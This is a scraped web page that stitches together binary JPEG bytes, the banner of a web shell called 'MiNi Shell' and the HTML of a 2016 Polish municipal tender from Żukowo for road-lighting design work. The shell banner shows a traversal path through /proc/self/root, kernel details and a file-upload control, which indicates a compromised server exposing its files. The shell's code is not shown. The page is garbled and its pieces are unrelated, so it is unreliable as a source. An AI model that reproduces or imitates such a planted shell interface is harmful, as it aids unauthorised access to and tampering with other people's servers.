JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160727/160895-N-2016.html

<p class="kh_header"><b>Żukowo: Opracowanie dokumentacji projektowo - kosztorysowych dla  budowy oświetlenia drogowego</b><br>
<b>Numer ogłoszenia: 160895 - 2016; data zamieszczenia: 27.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żukowo , ul. Gdańska 52, 83-330 Żukowo, woj. pomorskie, tel. +48 58 6858300, faks +48 58 6858300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zukowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo - kosztorysowych dla  budowy oświetlenia drogowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowo - kosztorysowych dla  budowy oświetlenia drogowego.
1.	Zamówienie obejmuje opracowanie dokumentacji projektowo - kosztorysowych dla budowy oświetlenia drogowego w zakresie następujących części zamówienia:
Część I - Chwaszczyno ul. Leśna (długość ok. 720 m); 
Część II - Banino ul. Polna, ul. Radosna, ul. Słoneczna, ul. Miła, ul. Tęczowa, ul. Szczęśliwa (długość ok. 2450 m); 
Część III - Żukowo ul. Słowackiego (długość ok.  660 m); 
Część IV - Miszewko ul. Brzozowa (długość ok. 650 m)  
	wraz z przygotowaniem dokumentów i wniosków w celu uzyskania decyzji o pozwoleniu na budowę oraz pełnienie nadzoru autorskiego (prawo opcji).
2. Zamówienie w zakresie dokumentacji projektowo - kosztorysowej obejmuje: 
1) projekty budowlane,
2) 	projekty wykonawcze, 
3) 	kosztorysy inwestorskie, zbiorcze zestawienie kosztów dla  budowy (ZZK), 
4) 	przedmiary robót,  
5) 	specyfikacje techniczne wykonania i odbioru robót budowlanych,
6) 	aktualizację kosztorysu inwestorskiego (dwukrotnie).</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>1.	Zamawiający może udzielić wykonawcy w okresie 3 lat od udzielenia zamówienia  podstawowego   zamówień uzupełniających, polegających na powtórzeniu tego samego rodzaju zamówienia, czyli opracowaniu dokumentacji projektowej, kosztorysów, przedmiarów, specyfikacji technicznych wykonania i odbioru robót budowlanych  w zakresie wszystkich branż objętych niniejszym zamówieniem, świadczenie usług nadzoru autorskiego. 
2.	Łączna wartość zamówień uzupełniających nie może być wyższa niż 50% wartości zamówienia   podstawowego.
3. Wynagrodzenie za usługi objęte zamówieniami uzupełniającymi będzie ustalane  w trakcie negocjacji z wykonawcą z uwzględnieniem składników cenotwórczych zaoferowanych w przetargu, a w przypadku ich braku o Środowiskowe Zasady Wyceny Prac Projektowych, wytyczne Okręgowej Izby Architektów i Inżynierów Budownictwa właściwej dla siedziby zamawiającego, kalkulację własną wykonawcy. Zamawiający dopuszcza stosowanie upustów do wyliczonych cen.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.00.00-2, 71.35.40.00-4, 71.24.50.00-7, 71.24.60.00-4, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 120.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia oferty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże posiadanie wiedzy i doświadczenia, rozumianej jako zasób umiejętności i praktykę, wyrażające się w wykonaniu w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch zamówień  polegających na opracowaniu dokumentacji projektowych dla budowy  oświetlenia drogowego, w tym co najmniej jednego oświetlenia drogowego o długości linii co najmniej 600 m.

Za zamówienie wykonane zostaną uznane usługi zakończone i odebrane przez zamawiającego przed upływem terminu składania ofert. 
W przypadku wykonawców wspólnie ubiegających się o zamówienie zamawiający wymaga się aby każdy z wykonawców wykazał spełnienie w/w warunku oddzielnie. 

Pod pojęciem >dokumentacja  projektowa< należy rozumieć co najmniej projekt budowlany i projekt wykonawczy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli wykonawca wskazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy prawo zamówień
publicznych, będzie polegał na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b cyt. ustawy,
podmiot ten musi uczestniczyć w realizacji zamówienia w takim zakresie zamówienia, dla której wykonawca polega na
jego zasobach. Nie można przekazać, ani zobowiązać się do udzielenia doświadczenia bez osobistego udziału
udzielającego tych zasobów w realizacji zamówienia. Wykonawca zobowiązany jest do wykazania tych podmiotów
(nazwy i adresy) na formularzu OFERTA. 2.Jeżeli wykonawca wykazując spełnienie warunków, o których mowa w art.
22 ust. 1 ustawy polega na zasobach innych podmiotów to składa w formie pisemnej zobowiązanie innego podmiotu,
które w sposób jednoznaczny i niebudzący wątpliwości określi: 1) kto jest podmiotem przyjmującym zasoby, 2) nazwę,
dane adresowe innego podmiotu, 3) zakres zobowiązania innego podmiotu (jakie zasoby udostępnia), 4) przedmiot
zobowiązania (czego dokładnie zobowiązanie dotyczy), 5) w jaki sposób zobowiązanie będzie realizowane: w jaki
sposób konkretne zasoby będą udostępnione i wykorzystywane przez wykonawcę przy wykonywaniu zamówienia, w
jakim okresie czasu itp., 6) charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem. Zamawiający musi
znać treść łączącego inny podmiot i wykonawcę stosunku zobowiązaniowego, wynikających z niego praw i
obowiązków, aby móc dokonać analizy i oceny rzeczywistego i realnego udostępnienia oraz korzystania z zasobów
podczas realizacji zamówienia. Podmiot udostępniający zasoby składa wraz z zobowiązaniem oświadczenie, iż
odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia deklarowanych
zasobów podczas realizacji zamówienia. W celu wykazania przez wykonawcę dysponowania zasobami innego
podmiotu wykonawca może przedstawić jedną z umów nazwanych, regulowanych postanowieniami Kodeksu
Cywilnego jak i oświadczenia woli innego podmiotu. Jeżeli przedmiotem udostępnienia będą wiedza i doświadczenie to
zobowiązanie powinno wprost wskazywać na jednoczesne uczestnictwo udostępniającego w realizacji zamówienia i
określeniu charakteru tego uczestnictwa. Zobowiązanie musi być podpisane przez osoby upoważnione do składania
oświadczeń woli w imieniu innego podmiotu (podpisy czytelne, a w przypadku kiedy podpisy są nieczytelne -
opatrzone pieczątkami imiennymi). Do pisemnego zobowiązania należy dołączyć: 1) dokument, z którego będzie
wynikało, kto jest upoważniony do składania oświadczeń woli w imieniu innego podmiotu, a jeżeli podmioty te będą
brały udział w realizacji części zamówienia: 1) oświadczenie o braku podstaw do wykluczenia w okolicznościach, o
których mowa w art. 24 ust. 1 ustawy prawo zamówień publicznych (OŚWIADCZENIE NR 3); 2) aktualny odpis z

właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy
wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1
pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Wszystkie
zobowiązania należy składać w oryginale. Dokumenty innych podmiotów podpisują osoby upoważnione do
reprezentowania tych podmiotów. 3. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie
wydaje się dokumentów, o których mowa wyżej, zastępuje się je oświadczeniem, w którym określa się także osoby
uprawnione do reprezentacji wykonawcy, złożonym przed notariuszem, właściwym organem sądowym,
administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania
osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Oświadczenie powinno być wystawione
nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Powyższe ma zastosowanie odpowiednio do
innych podmiotów. 4. W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego: 1)
oferta powinna zawierać pełnomocnictwo ustanawiające pełnomocnika (lidera) do reprezentowania wykonawców w
postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie
zamówienia publicznego, pełnomocnictwo należy złożyć w formie oryginału lub kopii poświadczonej przez notariusza,
2) każdy z wykonawców zobowiązany jest do dostarczenia dokumentów potwierdzających, że nie podlega
wykluczeniu z postępowania na podstawie art. 24 ust. 1 ustawy - prawo zamówień publicznych, 3) każdy z
wykonawców składa INFORMACJĘ NR 1 w zakresie przynależności do grupy kapitałowej lub braku przynależności do
grupy kapitałowej. 5. Jeżeli oferta wykonawców tworzących konsorcjum i ubiegających się wspólnie o udzielenie
zamówienia zostanie wybrana, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia
publicznego, umowy (porozumienia) regulującej współpracę tych wykonawców. 6. Jeżeli inaczej uregulowano zasady
współpracy i reprezentacji przedsiębiorców w spółce cywilnej, do oferty należy dołączyć pełnomocnictwo
ustanawiające pełnomocnika (lidera) do reprezentowania przedsiębiorców w postępowaniu o udzielenie zamówienia
publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Jeżeli
oferta spółki cywilnej zostanie wybrana, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia
publicznego umowy spółki cywilnej. 7. Upoważnienie do podpisania oferty (pełnomocnictwo) winno być dołączone do
oferty, o ile nie wynika to z innych dokumentów załączonych do oferty. Pełnomocnictwo w swojej treści winno
jednoznacznie wskazywać uprawnienie do podpisania oferty. Pełnomocnictwo należy przedłożyć w formie oryginału lub
kopii poświadczonej przez notariusza. 8. OŚWIADCZENIE NR 1, INFORMACJĘ NR 1 należy złożyć w formie
oryginału lub kopii poświadczonej przez notariusza. 9. Wszystkie oświadczenia oraz inne załączniki do oferty winny
być również podpisane przez upoważnionego przedstawiciela / przedstawicieli wykonawcy. Wszystkie dokumenty (z
zastrzeżeniem punktu 7 i punktu 8) muszą być przedstawione w formie oryginału lub kserokopii poświadczonej za
zgodność z oryginałem przez osobę / osoby upoważnione do reprezentowania wykonawcy - na każdej zapisanej
stronie poświadczonego dokumentu. Oświadczenia oraz załączniki dotyczące podmiotów udostępniających zasoby
podpisują odpowiednio osoby uprawnione do występowania w obrocie prawnym w imieniu tych podmiotów. 10. W
przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, kopie dokumentów dotyczących danego
wykonawcy są poświadczane za zgodność z oryginałem przez tego wykonawcę lub pełnomocnika.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres rękojmi - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie. 
2. 	Niedopuszczalne są zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, z wyjątkiem zmian o których mowa w ust. 3.
3.  Zmiany w umowie mogą dotyczyć:
1) terminu wykonania zamówienia,
2) wysokości wynagrodzenia wykonawcy,
3) udziału osób - projektantów.
4.  Zmiana terminu wykonania zamówienia może nastąpić w przypadku:
1) 	przerwy w realizacji zamówienia na skutek działań podmiotów trzecich, np. przedłużanie terminów wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, badań, ekspertyz, uzgodnień z przyczyn niezawinionych przez Wykonawcę,
2)	przedłużanie terminów uzgadniania dokumentacji projektowej przez organy administracji lub inne podmioty,
3) 	utrudnianie przez właścicieli nieruchomości dostępu do nieruchomości, 
4)	konieczności wykonania prac dodatkowych, które będą niezbędne dla  prawidłowej realizacji przedmiotu zamówienia, a których nie można było przewidzieć na etapie składania oferty,
5) 	rezygnacji z realizacji części zamówienia,
6) 	czasowego wstrzymania prac przez Zamawiającego,
7)	wprowadzenia zmian do dokumentacji projektowej w postaci prac dodatkowych, równoważnych, ale nie wykraczających poza zakres przedmiotu zamówienia na uzasadniony wniosek Wykonawcy, Zamawiającego i w sytuacji konieczności zwiększenia usprawnienia procesu projektowania, usunięcia wad ukrytych dokumentacji projektowej, uzyskania lepszego efektu użytkowego przedmiotu zamówienia,
8) zlecenia świadczenia nadzoru autorskiego podczas realizacji  robót budowlanych. 
5. 	Zmiana wysokości wynagrodzenia Wykonawcy może nastąpić w przypadku:
 	1) 	odstąpienia (rezygnacji) od części zamówienia,
2) wprowadzenia zmian do dokumentacji projektowej w postaci prac dodatkowych, równoważnych, ale nie wykraczających poza zakres przedmiotu zamówienia na uzasadniony wniosek Wykonawcy, Zamawiającego i w sytuacji konieczności zwiększenia usprawnienia procesu projektowania, uzyskania lepszego efektu użytkowego przedmiotu zamówienia,
     3) 	ustawowej zmiany stawki podatku VAT. 
6. 	Zmiana osób - projektantów może nastąpić w przypadku:
 	1)  zdarzeń losowych niezależnych od Wykonawcy,
	2)  utraty uprawnień przez wskazane przez Wykonawcę osoby,
	3)  wykreślenia osób z  listy członków branżowej izby samorządu zawodowego.
7.	W przypadku zmiany osób Wykonawca winien przedstawić Zamawiającemu nowe osoby o niegorszych kwalifikacjach i uprawnieniach w stosunku do osób, które zostały wskazane w ofercie Wykonawcy i spełniających wymagania opisane w specyfikacji istotnych warunków zamówienia.
8. 	Poza przypadkami określonymi w poprzedzających paragrafach umowy i ust. 3, zmiany umowy mogą wystąpić w następujących przypadkach:
1) 	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron umowy,
2) 	powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w niniejszej umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie niniejszej umowy w celu jednoznacznej interpretacji zapisów przez strony umowy,
3) 	wystąpią przyczyny niezależne od stron umowy, które będą skutkowały koniecznością zastosowania innych rozwiązań, gdy zastosowanie rozwiązań przewidzianych w specyfikacji istotnych warunków zamówienia                    groziłoby niewykonaniem  lub wadliwym wykonaniem przedmiotu zamówienia,
4) wystąpią środki ochrony prawnej w postępowaniu o zamówienie publiczne uniemożliwiające wykonanie zamówienia w terminie wskazanym w postępowaniu.  
9. 	Warunki dokonywania zmian:
1)  inicjowanie zmian na pisemny wniosek Wykonawcy lub Zamawiającego,
2)	uzasadnienie konieczności i wpływu zmian na realizację zamówienia,
3)  w formie pisemnego aneksu do umowy pod rygorem nieważności takiej zmiany.
10.Zmiany zapisów umowy, które nie odnoszą się do treści oferty nie wymagają pisemnego aneksu pod rygorem nieważności. Za zmiany takie uważa się np.:
1)  zmianę koordynatora za strony zamawiającego,
2)  zmianę koordynatora ze strony wykonawcy,
3) 	zmiany adresowe.
11.Strony zobowiązane są do powiadomienia na piśmie o zmianach o których mowa w  ust. 10 umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.zukowo.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Żukowie,
ul.Gdańska 52, 83-330 Żukowo; Referat Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2016 godzina 12:00, miejsce: Urząd Gminy w Żukowie, ul. Gdańska 52, 83-330 Żukowo; pok. nr 3 - Biuro Obsługi Klienta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I - Chwaszczyno ul. Leśna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) długość - ok. 720 m;
2) lokalizacja - wg załącznika graficznego  nr 1,
